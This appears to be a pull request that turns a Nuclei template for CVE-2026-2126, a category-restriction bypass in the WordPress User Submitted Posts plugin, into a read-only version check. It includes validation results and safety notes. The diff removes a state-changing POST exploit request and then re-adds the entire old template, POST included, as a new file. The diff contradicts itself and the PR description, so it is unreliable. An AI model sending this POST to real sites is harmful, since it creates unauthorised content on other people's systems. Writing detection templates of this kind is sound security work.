### PR TITLE
Add CVE-2026-2126 User Submitted Posts template

### DIFF
--- a/http/cves/2026/CVE-2026-2126.yaml
+++ b/http/cves/2026/CVE-2026-2126.yaml
@@ -1,39 +1,30 @@
 id: CVE-2026-2126
 
 info:
-  name: User Submitted Posts <= 20260113 - Incorrect Authorization to Unauthenticated Category Restriction Bypass
-  author: iamatownboy
+  name: User Submitted Posts <= 20260113 - Category Restriction Bypass
+  author: iamatownboy,type5afe
   severity: medium
   description: |
-    The User Submitted Posts plugin for WordPress is vulnerable to incorrect authorization because user-submitted category IDs are accepted from the POST body without being validated against the allowed categories configured by the administrator.
-    This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones.
-  impact: |
-    Unauthenticated attackers can bypass frontend category restrictions and submit posts to unauthorized categories.
-  remediation: |
-    Update User Submitted Posts to a version newer than 20260113.
+    User Submitted Posts versions up to and including 20260113 accept
+    user-controlled category IDs without validating them against the
+    administrator-configured allowed categories.
+  remediation: Update User Submitted Posts to version 20260217 or later.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-2126
-    - https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve
-    - https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431
-    - https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6
+    - https://atomicedge.io/cve-proof/cve-2026-2126-user-submitted-posts-version-20260113-medium-vulnerability-proof-of-concept/
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
-    cvss-score: 5.3
     cve-id: CVE-2026-2126
     cwe-id: CWE-863
+    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
   metadata:
     verified: true
-    max-request: 2
+    max-request: 1
     vendor: specialk
     product: user-submitted-posts
     framework: wordpress
-    publicwww-query: "/wp-content/plugins/user-submitted-posts/"
-  tags: cve,cve2026,wordpress,wp,wp-plugin,user-submitted-posts,authorization,category-bypass,unauth
-
-variables:
-  nonce: "{{rand_text_alpha(12)}}"
-
-flow: http(1) && http(2)
+  tags: cve,cve2026,wordpress,wp-plugin,user-submitted-posts,authorization
 
 http:
   - method: GET
@@ -43,38 +34,14 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - contains(body, "User Submitted Posts")
-          - compare_versions(version, "<= 20260113")
+          - "contains(to_lower(body), 'user submitted posts')"
+          - "compare_versions(plugin_version, '<= 20260113')"
         condition: and
-        internal: true
 
     extractors:
       - type: regex
-        name: version
+        name: plugin_version
         part: body
         group: 1
         regex:
-          - '(?i)Stable tag:\s*([0-9]+)'
-        internal: true
-
-  - raw:
-      - |
-        POST /wp-admin/admin-ajax.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        Origin: {{BaseURL}}
-        Referer: {{BaseURL}}/
-
-        usp-nonce={{nonce}}&user-submitted-title={{rand_int(10000,99999)}}&user-submitted-content={{rand_text_alpha(12)}}&user-submitted-name={{rand_text_alpha(8)}}&user-submitted-email={{rand_text_alpha(8)}}@example.com&user-submitted-url=https://test.com&user-submitted-tags=test&user-submitted-category[]=999999&user-submitted-captcha=2
-
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - "success"
-          - "submitted"
-        condition: or
-# digest: 4a0a00473045022100b3d8f4df3c6e8b6d7d1d2a7d9ccfbb6a6b4f4afc2c5a3b0d6a9f7d5b3c1a2f402203a1a9d3e7b2d8b1a4c6f8d9e0b1c2d3e4f5061728394a5b6c7d8e9f001122334:922c64590222798bb761d5b6d8e72950
+          - '(?i)(?:Stable tag|Version):\s*([0-9]{8})'

--- a/http/cves/2026/CVE-2026-2126.yaml
+++ b/http/cves/2026/CVE-2026-2126.yaml
@@ -1,0 +1,80 @@
+id: CVE-2026-2126
+
+info:
+  name: User Submitted Posts <= 20260113 - Incorrect Authorization to Unauthenticated Category Restriction Bypass
+  author: iamatownboy
+  severity: medium
+  description: |
+    The User Submitted Posts plugin for WordPress is vulnerable to incorrect authorization because user-submitted category IDs are accepted from the POST body without being validated against the allowed categories configured by the administrator.
+    This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones.
+  impact: |
+    Unauthenticated attackers can bypass frontend category restrictions and submit posts to unauthorized categories.
+  remediation: |
+    Update User Submitted Posts to a version newer than 20260113.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-2126
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve
+    - https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431
+    - https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-2126
+    cwe-id: CWE-863
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: specialk
+    product: user-submitted-posts
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/user-submitted-posts/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,user-submitted-posts,authorization,category-bypass,unauth
+
+variables:
+  nonce: "{{rand_text_alpha(12)}}"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/user-submitted-posts/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "User Submitted Posts")
+          - compare_versions(version, "<= 20260113")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        usp-nonce={{nonce}}&user-submitted-title={{rand_int(10000,99999)}}&user-submitted-content={{rand_text_alpha(12)}}&user-submitted-name={{rand_text_alpha(8)}}&user-submitted-email={{rand_text_alpha(8)}}@example.com&user-submitted-url=https://test.com&user-submitted-tags=test&user-submitted-category[]=999999&user-submitted-captcha=2
+
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "submitted"
+        condition: or
+# digest: 4a0a00473045022100b3d8f4df3c6e8b6d7d1d2a7d9ccfbb6a6b4f4afc2c5a3b0d6a9f7d5b3c1a2f402203a1a9d3e7b2d8b1a4c6f8d9e0b1c2d3e4f5061728394a5b6c7d8e9f001122334:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
- Added a non-invasive CVE-2026-2126 detection template
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2026-2126
  - https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6
  - https://atomicedge.io/cve-proof/cve-2026-2126-user-submitted-posts-version-20260113-medium-vulnerability-proof-of-concept/

Supersedes #16648

### Changes based on review feedback

The previous submission was closed because:

1. The nonce was randomly generated, so the server rejected the request before
   reaching the vulnerable category-processing logic.
2. The matcher relied on generic HTTP status and response words, which caused
   false positives on FOFA results.
3. The submission did not provide a working and reproducible validation result.

These issues were addressed as follows:

1. The public template no longer generates or submits a random nonce.
2. The public template no longer sends a state-changing POST request.
3. The public template performs one read-only GET request to:

   `/wp-content/plugins/user-submitted-posts/readme.txt`

4. The template confirms that User Submitted Posts is present and that the
   installed version is less than or equal to `20260113`.
5. Generic HTTP 200 and generic response-word matchers were removed.
6. The category-bypass POST PoC was validated separately in an authorized local
   WordPress environment.
7. The vulnerable version was detected and the patched version `20260217` was
   not detected.

### Template validation

- [x] Validated with a host running a vulnerable version and configuration
- [x] Validated with a host running a patched version and configuration

Authorized local validation matrix:

| Plugin version | Allowed categories | Categories shown by form | Submitted category | Result |
|---|---:|---|---:|---|
| 20260113 | [2] | 2 | 1 | 302, post created |
| 20260113 | [3] | 3 | 1 | 302, post created |
| 20260113 | [2,3] | 2,3 | 1 | 302, post created |
| 20260217 | [2,3] | 2,3 | 1 | 302, usp-error=required-category, no post created |

The vulnerable-version POST response was:

```http
HTTP/1.1 302 Found
Location: /?success=1&post_id=...
```

This confirms that the vulnerable version created a WordPress post after
receiving a category ID that was not shown as an allowed category.

The patched version returned:

```http
HTTP/1.1 302 Found
Location: /?usp-error=required-category
```

No `post_id` was returned and no post was created.

The non-invasive Nuclei template also did not detect the patched version.

### Safety and limitations

The category-bypass PoC is state-changing. A successful POST creates a new
WordPress post on the target and returns a redirect containing
`success=1&post_id=<id>`.

For this reason:

- The POST PoC was executed only against an authorized local test instance.
- The public Nuclei template does not send the POST request.
- The public template performs only one read-only GET request.
- The temporary local test environment was removed after testing.
- The category IDs in the validation matrix are test-environment values and
  are not assumed to be universal across all WordPress sites.
- The submission form may be hosted on a site-specific page; the public
  template intentionally performs only version-based detection.
- The POST PoC must not be used against systems without explicit
  authorization.

The POST PoC is provided as validation evidence only and is intentionally not
included in the public template because it creates content on the target.